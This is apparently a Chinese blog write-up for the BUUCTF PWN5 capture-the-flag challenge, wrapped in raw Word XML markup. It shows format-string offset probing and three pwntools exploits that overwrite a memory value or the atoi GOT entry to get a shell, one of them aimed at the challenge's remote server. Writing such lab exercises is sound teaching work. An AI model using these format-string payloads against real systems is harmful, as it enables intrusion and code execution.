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883" w:rsidRPr="00CB3883" w:rsidRDefault="00CB3883" w:rsidP="00CB3883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CB3883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BUUCTF - [</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3883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第五空间</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3883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 xml:space="preserve">2019 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3883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决赛</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3883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]PWN5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3883" w:rsidRPr="00CB3883" w:rsidRDefault="00CB3883" w:rsidP="00CB3883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r w:rsidRPr="00CB3883">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="宋体" w:hAnsi="Segoe UI Emoji" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="0000FF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upload.jianshu.io/users/upload_avatars/6183510/10bbe8a4-86d6-43b5-ac11-260b093616f9.jpg?imageMogr2/auto-orient/strip|imageView2/1/w/96/h/96/format/webp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BC8B42" id="矩形 1" o:spid="_x0000_s1026" alt="https://upload.jianshu.io/users/upload_avatars/6183510/10bbe8a4-86d6-43b5-ac11-260b093616f9.jpg?imageMogr2/auto-orient/strip|imageView2/1/w/96/h/96/format/webp" href="https://www.jianshu.com/u/96bc3cfe1a4f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B3883" w:rsidRPr="00CB3883" w:rsidRDefault="00CB3883" w:rsidP="00CB3883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hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00CB3883">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="宋体" w:hAnsi="Segoe UI Emoji" w:cs="宋体"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>余生似梦</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CB3883">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="宋体" w:hAnsi="Segoe UI Emoji" w:cs="宋体"/>
          <w:color w:val="404040"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>关注</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3883" w:rsidRPr="00CB3883" w:rsidRDefault="00CB3883" w:rsidP="00CB3883">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="宋体" w:hAnsi="Segoe UI Emoji" w:cs="宋体"/>
          <w:color w:val="969696"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB3883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2020.07.09 14:03:20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3883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字数</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3883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313</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3883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阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3883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242</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3883" w:rsidRPr="00CB3883" w:rsidRDefault="00CB3883" w:rsidP="00CB3883">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="24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</w:pPr>
      <w:r w:rsidRPr="00CB3883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地址：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3883" w:rsidRPr="00CB3883" w:rsidRDefault="00CB3883" w:rsidP="00CB388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CB3883">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="0681D0"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://buuoj.cn/challenges#[%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B42019%20%E5%86%B3%E8%B5%9B]PWN5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CB3883" w:rsidRPr="00CB3883" w:rsidRDefault="00CB3883" w:rsidP="00CB3883">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="24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</w:pPr>
      <w:r w:rsidRPr="00CB3883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解题思路：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</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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@unic0rn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~/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pwn</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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# file pwn5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pwn5: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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ELF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32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bit </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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LSB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executable, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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Intel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80386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version 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CB388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SYSV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), dynamically linked, interpreter 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lib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ld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linux.so.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CB388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B388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GNU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CB388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Linux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3.2.0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CB388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BuildID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[sha1]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6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a8aa744920dda62e84d44fcc440c05f31c4c23d, stripped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</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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@unic0rn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~/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pwn</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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# checksec pwn5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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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'/root/pwn/pwn5'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CB388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Arch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    i386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32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little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CB388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RELRO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   </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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Partial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B388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RELRO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CB388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Stack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   </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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Canary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found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CB388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NX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      </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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NX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enabled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CB388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PIE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     </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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No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B388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PIE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0x8048000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CB3883" w:rsidRPr="00CB3883" w:rsidRDefault="00CB3883" w:rsidP="00CB388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883">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>运行文件之后，出现两处输入，name和passwd，并且name的输入有回显，则有可能是栈漏洞和格式化字符串。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</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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@unic0rn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~/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pwn</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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./pwn5 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your name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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:admin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Hello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,admin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ÿ</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3883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񱗿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ÿyour passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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:admin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>fail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3883" w:rsidRPr="00CB3883" w:rsidRDefault="00CB3883" w:rsidP="00CB3883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CB3883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计算偏移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</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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@joe1sn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~/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download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CB388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BUUCTF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CB388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PWN5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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./pwn 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your name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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:aaaa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-%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-%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-%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-%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-%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-%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-%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-%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-%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-%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-%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-%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-%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Hello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,aaaa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0xffb44588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0x63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CB388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nil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CB388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nil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0x3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0xf7f8c950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0xc2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CB388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nil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0xc30000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0x61616161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0x2d70252d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0x252d7025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0x70252d70</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3883" w:rsidRPr="00CB3883" w:rsidRDefault="00CB3883" w:rsidP="00CB388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883">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>格式化字符串的利用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3883" w:rsidRPr="00CB3883" w:rsidRDefault="00CB3883" w:rsidP="00CB3883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883">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%x是吧数据以16进制输出</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3883">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>%n是把已经输出的字符数目输入传来参数的地址中，这就可以使我们修改数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3883" w:rsidRPr="00CB3883" w:rsidRDefault="00CB3883" w:rsidP="00CB3883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883">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>思路1：直接利用格式化字符串改写unk_804C044之中的数据，然后输入数据对比得到shell。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3883" w:rsidRPr="00CB3883" w:rsidRDefault="00CB3883" w:rsidP="00CB3883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883">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>思路2：利用格式化字符串改写atoi的got地址，将其改为system的地址，配合之后的输入，得*到shell。这种方法具有普遍性，也可以改写后面的函数的地址，拿到shell。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3883" w:rsidRPr="00CB3883" w:rsidRDefault="00CB3883" w:rsidP="00CB3883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883">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>思路3：bss段的unk_804C044，是随机生成的，而我们猜对了这个参数，就可以执行system("/bin/sh"),刚好字符串格式化漏洞可以实现改写内存地址的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3883" w:rsidRPr="00CB3883" w:rsidRDefault="00CB3883" w:rsidP="00CB388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883">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exp1：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from pwn import *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 = process('./pwn5')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addr = 0x0804C044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#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地址，也就相当于可打印字符串，共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16byte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payload = p32(addr)+p32(addr+1)+p32(addr+2)+p32(addr+3)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#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开始将前面输出的字符个数输入到地址之中，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hhn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是单字节输入，其偏移为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10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#%10$hhn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就相当于读取栈偏移为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10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的地方的数据，当做地址，然后将前面的字符数写入到地址之中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>payload += "%10$hhn%11$hhn%12$hhn%13$hhn"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p.sendline(payload)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p.sendline(str(0x10101010))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p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3883" w:rsidRPr="00CB3883" w:rsidRDefault="00CB3883" w:rsidP="00CB388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883">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exp2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from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pwn </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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p 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process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CB388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'./pwn5'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elf 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B388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ELF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CB388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'./pwn5'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atoi_got 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elf.got[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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'atoi'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system_plt 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elf.plt[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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'system'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payload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fmtstr_payload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10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,{atoi_got:system_plt})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p.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sendline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(payload)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p.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sendline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CB388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'/bin/sh\x00'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p.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interactive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CB3883" w:rsidRPr="00CB3883" w:rsidRDefault="00CB3883" w:rsidP="00CB388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883">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exp3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from pwn import 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#context.log_level = "debug"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p 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remote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CB388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"node3.buuoj.cn"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26486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unk_804C044 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0x0804C044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payload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fmtstr_payload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10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,{unk_804C044</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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0x1111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})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p.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sendlineafter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CB388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"your name:"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,payload)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p.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sendlineafter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CB388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"your passwd"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str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0x1111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))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB3883" w:rsidRPr="00CB3883" w:rsidRDefault="00CB3883" w:rsidP="00CB388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p.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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interactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB388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6E07E6" w:rsidRDefault="006E07E6">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="006E0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141" w:rsidRDefault="00B60141" w:rsidP="00CB3883">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B60141" w:rsidRDefault="00B60141" w:rsidP="00CB3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141" w:rsidRDefault="00B60141" w:rsidP="00CB3883">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B60141" w:rsidRDefault="00B60141" w:rsidP="00CB3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67D4E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E4F0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9A1"/>
    <w:rsid w:val="006E07E6"/>
    <w:rsid w:val="00B60141"/>
    <w:rsid w:val="00CB3883"/>
    <w:rsid w:val="00F2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7CB01E-0FB0-4635-81F3-5703C422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B38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CB388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8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88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38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CB3883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CB3883"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fxyr8x">
    <w:name w:val="fxyr8x"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00CB3883"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CB3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B38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B388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B388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B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2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3069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17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8968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0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7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164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17278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u/96bc3cfe1a4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u/96bc3cfe1a4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ks.jianshu.com/go?to=https%3A%2F%2Fbuuoj.cn%2Fchallenges%23%255B%25E7%25AC%25AC%25E4%25BA%2594%25E7%25A9%25BA%25E9%2597%25B42019%2520%25E5%2586%25B3%25E8%25B5%259B%255DPWN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stare</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>stare</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-22T05:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-22T05:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>